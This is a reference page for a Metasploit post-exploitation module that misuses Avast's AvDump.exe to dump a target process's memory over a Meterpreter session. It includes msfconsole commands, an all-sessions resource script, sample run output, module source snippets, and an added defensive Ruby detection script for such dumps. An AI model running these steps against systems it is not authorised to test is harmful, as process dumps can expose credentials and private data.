Avast AV Memory Dumping Utility - Metasploit
This page contains detailed information about how to use the post/windows/gather/avast_memory_dump Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Avast AV Memory Dumping Utility
Module: post/windows/gather/avast_memory_dump
Source code: modules/post/windows/gather/avast_memory_dump.rb
Disclosure date: -
Last modification time: 2021-05-13 04:01:03 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module leverages an Avast Anti-Virus memory dump utility that is shipped by default with Avast Anti-Virus Home software suite.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/gather/avast_memory_dump
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/gather/avast_memory_dump
msf post(avast_memory_dump) > show options
... show and set options ...
msf post(avast_memory_dump) > set SESSION session-id
msf post(avast_memory_dump) > exploit
If you wish to run the post module against all sessions from the framework, here is how:
1 - Create the following resource script:
<ruby>
framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/avast_memory_dump")
  run_single("set SESSION #{sid}")
  run_single("run")
end
</ruby>
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
SESSION: The session to run this module on.
PID: specify pid to dump
Knowledge Base
Vulnerable Application - Avast Home Security Suite - Avdump.exe
The Avast Home Security suite ships with a memory dumping utility that can be leveraged to dump the process memory of user-defined processes to user-defined locations.
A detailed write up can be found at https://archcloudlabs.com/projects/dumping-memory-with-av/
Verification Steps
Verify that the path C:\Program Files\Avast Software\Avast\AvDump.exe exists.
1. Start msfconsole
2. Get meterpreter session
3. Do: use post/windows/gather/avast_memory_dump
4. Do: set SESSION <session id>
5. Do: set DUMP_PATH <specify path dest>
6. Do: set PID <pid>
7. Do: run
Options
PID Specify the PID of the process you would like to dump.
DUMP_PATH Specify the location to write the memory dump to.
Scenarios
Windows 10 (2004 OS Build 19041.572)
msf5 > search avast
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/avast_memory_dump normal No Avast AV Memory Dumping Utility
msf5 > use 0
msf5 post(windows/gather/avast_memory_dump) > sessions -C 'ps -N notepad.exe'
[*] Running 'ps -N notepad.exe' on meterpreter session 4 (192.168.218.131)
Filtering on 'notepad.exe'
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
8504 1812 notepad.exe x64 1 DESKTOP-CD2VHVO\user C:\Windows\System32\notepad.exe
msf5 post(windows/gather/avast_memory_dump) > show options
Module options (post/windows/gather/avast_memory_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_PATH C:\Users\Public\test.dmp yes specify location to write dump file to
PID 8504 yes specify pid to dump
SESSION 4 yes The session to run this module on.
msf5 post(windows/gather/avast_memory_dump) > set PID 8504
PID => 8504
msf5 post(windows/gather/avast_memory_dump) > set SESSION 4
SESSION => 4
msf5 post(windows/gather/avast_memory_dump) > run
[*] [2020.10.21-22:49:24] AvDump.exe exists!
[*] [2020.10.21-22:49:24] executing Avast mem dump utility against 8504 to C:\Users\Public\test.dmp
[*] [2020.10.21-22:49:29] [2020-10-22 02:49:26.969] [info ] [dump ] [ 1400: 8032] Dumpmaster is arming.
[2020-10-22 02:49:27.047] [info ] [dump ] [ 1400: 8032] Successfully dumped process 8504 into 'C:\Users\Public\test.dmp'
[2020-10-22 02:49:27.047] [info ] [log_module ] [ 1400: 8032] LogModule is going to be destroyed.
[2020-10-22 02:49:27.047] [info ] [log_module ] [ 1400: 8032] =====================================================================================================================
[*] Post module execution completed
Msfconsole Usage
Here is how the windows/gather/avast_memory_dump post exploitation module looks in the msfconsole:
msf6 > use post/windows/gather/avast_memory_dump
msf6 post(windows/gather/avast_memory_dump) > show info
Name: Avast AV Memory Dumping Utility
Module: post/windows/gather/avast_memory_dump
Platform: Windows
Arch:
Rank: Normal
Provided by:
DLL_Cool_J
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_PATH C:\Users\Public\tmp.dmp yes specify location to write dump file to
PID yes specify pid to dump
SESSION yes The session to run this module on.
Description:
This module leverages an Avast Anti-Virus memory dump utility that
is shipped by default with Avast Anti-Virus Home software suite.
Module Options
This is a complete list of options available in the windows/gather/avast_memory_dump post exploitation module:
msf6 post(windows/gather/avast_memory_dump) > show options
Module options (post/windows/gather/avast_memory_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_PATH C:\Users\Public\tmp.dmp yes specify location to write dump file to
PID yes specify pid to dump
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the windows/gather/avast_memory_dump post exploitation module:
msf6 post(windows/gather/avast_memory_dump) > show advanced
Module advanced options (post/windows/gather/avast_memory_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/gather/avast_memory_dump module can do:
msf6 post(windows/gather/avast_memory_dump) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/gather/avast_memory_dump post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/gather/avast_memory_dump) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
AvDump.exe does not exist on target.
Here is a relevant code snippet related to the "AvDump.exe does not exist on target." error message:
      end
    end
  end

  def run
    fail_with(Failure::NotVulnerable, 'AvDump.exe does not exist on target.') unless avdump
    print_status('AvDump.exe exists!')

    dump_path = datastore['DUMP_PATH']
    pid = datastore['PID'].to_s

Dump file <DUMP_PATH> was not created
Here is a relevant code snippet related to the "Dump file <DUMP_PATH> was not created" error message:
    pid = datastore['PID'].to_s

    print_status("Executing Avast memory dumping utility (#{avdump}) against pid #{pid} writing to #{dump_path}")
    result = cmd_exec("#{avdump} --pid #{pid} --exception_ptr 0 --thread_id 0 --dump_file \"#{dump_path}\" --min_interval 0")

    fail_with(Failure::Unknown, "Dump file #{dump_path} was not created") unless file_exist?(dump_path)
    print_status(dump_path)
    mem_file = read_file(dump_path)
    store_loot('host.avast.memdump', 'binary/db', session, mem_file)

    print_status(result)
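The command line the module hands to AvDump.exe in the snippet above, together with the Knowledge Base description of a vendor-shipped dumper writing to attacker-chosen locations, is what a defender would build an alert on. The following Ruby is an added example for this page, not code from the Metasploit module or its documentation. It parses constructed process-creation events (the image, parent image and command line fields that Sysmon Event ID 1 or Security event 4688 provide), flags AvDump.exe runs that carry --pid and --dump_file, and extracts the targeted PID and dump destination for triage. The two heuristics (parent process outside the Avast directory, dump written under C:\Users) and the example_parent.exe name are assumptions of this example, not facts from the page.

```ruby
# Added example, not part of the Metasploit module or its docs: detect AvDump.exe
# being driven as a memory dumper and report where the dump went.

# Constructed sample events, reduced to the three fields the detection needs.
# The first command line mirrors the one the module builds; example_parent.exe
# is a hypothetical name standing in for an Avast component.
SAMPLE_EVENTS = [
  { image: 'C:\Program Files\Avast Software\Avast\AvDump.exe',
    parent_image: 'C:\Windows\System32\cmd.exe',
    command_line: '"C:\Program Files\Avast Software\Avast\AvDump.exe" --pid 8504 --exception_ptr 0 --thread_id 0 --dump_file "C:\Users\Public\test.dmp" --min_interval 0' },
  { image: 'C:\Program Files\Avast Software\Avast\AvDump.exe',
    parent_image: 'C:\Program Files\Avast Software\Avast\example_parent.exe',
    command_line: '"C:\Program Files\Avast Software\Avast\AvDump.exe" --pid 1400 --exception_ptr 0 --thread_id 0 --dump_file "C:\Program Files\Avast Software\Avast\report\crash.dmp" --min_interval 0' },
  { image: 'C:\Windows\System32\notepad.exe',
    parent_image: 'C:\Windows\explorer.exe',
    command_line: 'notepad.exe C:\Users\user\notes.txt' },
]

AVDUMP_IMAGE = /\\avdump\.exe\z/i
# Assumption for this example: AvDump launched by Avast's own components has a
# parent under this directory; anything else spawning it is treated as unusual.
AVAST_DIR = /\AC:\\Program Files\\Avast Software\\/i
USER_WRITABLE = /\AC:\\Users\\/i

# Parse "--key value" switches; values may be double-quoted (paths with spaces).
def parse_avdump_switches(command_line)
  switches = {}
  command_line.scan(/--(\w+)\s+(?:"([^"]*)"|(\S+))/) do |key, quoted, bare|
    switches[key] = quoted || bare
  end
  switches
end

# Return nil for events that are not an AvDump dump run, otherwise a triage record.
def classify_avdump_event(event)
  return nil unless event[:image] =~ AVDUMP_IMAGE
  switches = parse_avdump_switches(event[:command_line])
  return nil unless switches['pid'] && switches['dump_file']

  indicators = []
  indicators << 'spawned outside Avast directory' unless event[:parent_image] =~ AVAST_DIR
  indicators << 'dump written to user-writable path' if switches['dump_file'] =~ USER_WRITABLE
  {
    target_pid: switches['pid'].to_i,
    dump_file: switches['dump_file'],
    parent: event[:parent_image],
    indicators: indicators,
    severity: indicators.empty? ? 'low' : 'high'
  }
end

def scan_events(events)
  events.map { |event| classify_avdump_event(event) }.compact
end

if __FILE__ == $PROGRAM_NAME
  scan_events(SAMPLE_EVENTS).each do |hit|
    puts "#{hit[:severity].upcase}: AvDump dumped pid #{hit[:target_pid]} to #{hit[:dump_file]} " \
         "(parent #{hit[:parent]}; #{hit[:indicators].empty? ? 'no extra indicators' : hit[:indicators].join(', ')})"
  end
end
```

Running the file prints one HIGH line for the cmd.exe-launched dump into C:\Users\Public and one LOW line for the constructed run that stays inside the Avast directory; the module's default DUMP_PATH values shown on this page both fall under C:\Users, so the second heuristic alone would catch its out-of-the-box configuration.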
Related Pull Requests
- #15192 Merged Pull Request: Enforce Style/RedundantBegin for new modules
- #14893 Merged Pull Request: Updating avast_memory_dump.rb - Adding additional AVDump.exe file paths
- #14734 Merged Pull Request: Rubocop recently landed modules
- #14298 Merged Pull Request: Windows post-exploitation gather module - Memory dumping via Avast AvDump utility
See Also
Check also the following modules related to this module:
- post/windows/gather/ad_to_sqlite
- post/windows/gather/arp_scanner
- post/windows/gather/bitcoin_jacker
- post/windows/gather/bitlocker_fvek
- post/windows/gather/bloodhound
- post/windows/gather/cachedump
- post/windows/gather/checkvm
- post/windows/gather/dnscache_dump
- post/windows/gather/dumplinks
- post/windows/gather/enum_ad_bitlocker
- post/windows/gather/enum_ad_computers
- post/windows/gather/enum_ad_groups
- post/windows/gather/enum_ad_managedby_groups
- post/windows/gather/enum_ad_service_principal_names
- post/windows/gather/enum_ad_to_wordlist
- post/windows/gather/enum_ad_user_comments
- post/windows/gather/enum_ad_users
- post/windows/gather/enum_applications
- post/windows/gather/enum_artifacts
- post/windows/gather/exchange
- post/windows/gather/file_from_raw_ntfs
- post/windows/gather/get_bookmarks
- post/windows/gather/hashdump
- post/windows/gather/local_admin_search_enum
- post/windows/gather/lsa_secrets
- post/windows/gather/make_csv_orgchart
- post/windows/gather/memory_dump
- post/windows/gather/memory_grep
- post/windows/gather/netlm_downgrade
- post/windows/gather/ntds_grabber
- post/windows/gather/ntds_location
- post/windows/gather/outlook
- post/windows/gather/phish_windows_credentials
- post/windows/gather/psreadline_history
- post/windows/gather/resolve_sid
- post/windows/gather/reverse_lookup
- post/windows/gather/screen_spy
- post/windows/gather/smart_hashdump
- post/windows/gather/tcpnetstat
- post/windows/gather/usb_history
- post/windows/gather/win_privs
- post/windows/gather/wmic_command
- post/windows/gather/word_unc_injector
Authors
- DLL_Cool_J
Version
This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.